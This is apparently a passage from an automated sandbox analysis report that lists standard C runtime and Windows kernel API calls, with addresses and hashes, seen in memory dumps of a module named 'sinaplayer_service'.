                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __daylight__dstbias__timezone_get_daylight_invoke_watson_malloc_crtfreestrcmpstrlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1461246701-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 6D09281E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 626452242-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D163B90,00000000,6D163B90,00000001,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10BF33
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D163B90,00000000,6D163B90,00000001,00000000,00000001,?,00000000,00000000,6D163B90,6D0FC0DE), ref: 6D10BF3D
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000001,00000000,00000000,6D163B90,00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10BF68
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(6D163B90,6D163B90,00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10BFE3
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(6D163B90,6D163B90,00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10C030
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10C05D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000001,6D163B90,00000000,6D163B90), ref: 6D10C067
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo_ismbblead_l$_invalid_parameterstrncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 757364618-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,00006A69), ref: 6D0A1A4A
                                                                                                                                                                                                    • free.MSVCR120(?,?,00006A69), ref: 6D0A1A55
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000050), ref: 6D0A2860
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A2881
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6D0A28A4
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0E01B6
                                                                                                                                                                                                    • ___free_lconv_num.LIBCMT ref: 6D0E01C7
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0E01D4
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0E01DD
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6D0A1C46
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6D0A1C5B
                                                                                                                                                                                                      • Part of subcall function 6D0A1BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6D0A1C77
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$InfoLocale__crt_calloc_crt_malloc_crt$___free_lconv_nummalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2413701623-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo_ismbblead_l$strncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3147246080-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 467780811-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0AFEAB
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0AFEC8
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D15F520,?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0B1427
                                                                                                                                                                                                    • __p__iob.MSVCR120(6D15F520,?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0B1437
                                                                                                                                                                                                    • _errno.MSVCR120(?,00000000,?,?,6D0AFEEC,?,?), ref: 6D0D5272
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob_errno$_fileno
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(E18D5491), ref: 6D0F21EA
                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(?,00000064,00000000), ref: 6D0F2216
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6D0F2221
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,6D15B718,000000FF), ref: 6D0F224E
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::DiscardExistingSchedulerStatistics.LIBCMT ref: 6D0F226C
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::SendResourceNotifications.LIBCMT ref: 6D0F227D
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,6D15B718,000000FF), ref: 6D0F2282
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::SendResourceNotifications.LIBCMT ref: 6D0F229E
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F22C7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Concurrency::details::Count64Manager::Tick__crt$CriticalNotificationsSectionSend$DiscardEnterExistingLeaveObjectSchedulerSingleStatisticsWait
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000008,6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001), ref: 6D0B4174
                                                                                                                                                                                                    • DecodePointer.KERNEL32(6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41B1
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41C6
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41DF
                                                                                                                                                                                                    • DecodePointer.KERNEL32(-00000004,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41EF
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B41F9
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B420F
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F,00000001,00000000), ref: 6D0B421A
                                                                                                                                                                                                      • Part of subcall function 6D0B4113: GetModuleHandleW.KERNEL32(00000000,6D0B416A,6D0B4238,0000001C,6D0FBBC7,00000000,00000001,00000000,?,6D0FBBA8,000000FF,?,6D0D3CEC,00000010,00000000,6D08F77F), ref: 6D0B4115
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Decode$Encode$HandleModule_lock
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __unDName.MSVCR120(00000000,?,00000000,?,?,00002800,6D094110,0000000C), ref: 6D0A3979
                                                                                                                                                                                                    • strlen.MSVCR120(00000000), ref: 6D0A398C
                                                                                                                                                                                                    • _lock.MSVCR120(0000000E), ref: 6D0A39A9
                                                                                                                                                                                                    • malloc.MSVCR120(00000008), ref: 6D0A39BB
                                                                                                                                                                                                    • malloc.MSVCR120(-00000004), ref: 6D0A39CC
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000004,00000000), ref: 6D0A39E0
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0A3A05
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: malloc$Name__un_lockfreestrcpy_sstrlen
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0FA549: CreateThread.KERNEL32(00000000,00010000,00000000,00000000,?,6D0F22EF), ref: 6D0FA55C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6D0D29FC), ref: 6D0F002F
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,0000000F,?,?,?,?,?,6D0D29FC), ref: 6D0F003E
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0D29FC), ref: 6D0F005D
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0D29FC), ref: 6D0F006B
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6D0F00BA
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 6D0F00C8
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 6D0F00D1
                                                                                                                                                                                                    • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 6D0F00DE
                                                                                                                                                                                                    • free.MSVCR120 ref: 6D0F00ED
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSectionThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEnterErrorEventExceptionLastLeaveObjectPrioritySingleThrowWaitfree
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000007,6D0AE490,00000010), ref: 6D0AE428
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,6D0AE490,00000010), ref: 6D0AE7B6
                                                                                                                                                                                                    • calloc.MSVCR120(00000001,00000002,00000000,6D0AE490,00000010), ref: 6D0AE7C1
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,?), ref: 6D0AE7DB
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AE490,00000010), ref: 6D0DF4D5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AE490,00000010), ref: 6D0DF4DF
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DF4F0
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DF4FB
                                                                                                                                                                                                      • Part of subcall function 6D0A9555: wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9571
                                                                                                                                                                                                      • Part of subcall function 6D0A9555: wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9580
                                                                                                                                                                                                      • Part of subcall function 6D0A9555: _wcsnicoll.MSVCR120(00000000,00000000,00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A959D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errnowcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 505790351-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000000,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0A4766
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000,?,?,?), ref: 6D0D2BED
                                                                                                                                                                                                    • free.MSVCR120(?,00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0D2BF5
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0D2BFD
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,?,00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0D2C14
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,?,?,?), ref: 6D0D2C33
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,?,?,?), ref: 6D0D2C4A
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000000,?,?,?), ref: 6D0D2C65
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 6D0D2C75
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: freememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2499939622-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0A6958
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000028,0000002C,6D0A69D2,?,00000000,?,?,?,6D0A3D6E,6D0948CA,00000000,0000000C,6D0A3E4B,?,00000000,?), ref: 6D0A6961
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,6D160674,00000028,0000002C,6D0A69D2,?,00000000,?,?,?,6D0A3D6E,6D0948CA,00000000,0000000C,6D0A3E4B,?), ref: 6D0A697B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001), ref: 6D0A6990
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001), ref: 6D0A699B
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0D336F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E76B4,6D15D0A4), ref: 6D0D3384
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,6D0E76B4,6D15D0A4), ref: 6D0D33A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1089537546-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F52
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F5E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F6C
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F78
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F8D
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FAA
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FBB
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FC1
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FD1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4002485106-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC), ref: 6D0ABF53
                                                                                                                                                                                                    • _getptd.MSVCR120 ref: 6D0ABF64
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,?), ref: 6D0ABF6D
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000D), ref: 6D091C41
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000C), ref: 6D091C62
                                                                                                                                                                                                    • CreateThread.KERNEL32(?,?,6D0ABFB4,00000000,?,?), ref: 6D0ABF9B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D3EAF
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D3EBA
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D3ECF
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D3EDA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _lock$CreateThread__dosmaperr_calloc_crt_errno_getptd_initptd_invalid_parameter_noinfofree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1715317214-0
                                                                                                                                                                                                    • Opcode ID: acca400ecba006f2e582ac86e5eba482ea40465d57e86d31553ac8e874ab7d5b
                                                                                                                                                                                                    • Instruction ID: 8c714c33bad1310bcb9991155870c67083a7e3ce70a6a983fe029ff2bc62dd3b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: acca400ecba006f2e582ac86e5eba482ea40465d57e86d31553ac8e874ab7d5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11C23210970BAFFB019FA5DC40B6B7BA8EF492B4705412AFA24871C1DB71D4018B60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 6D09EE72
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D09EE7C
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D09EE83
                                                                                                                                                                                                      • Part of subcall function 6D09E4A7: __doserrno.MSVCR120(00000000,?,6D0DEE56,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D09E4AB
                                                                                                                                                                                                      • Part of subcall function 6D09E4A7: _errno.MSVCR120(00000000,?,6D0DEE56,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D09E4BE
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D09EE89
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D42A2
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D42AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D42B4
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D42C0
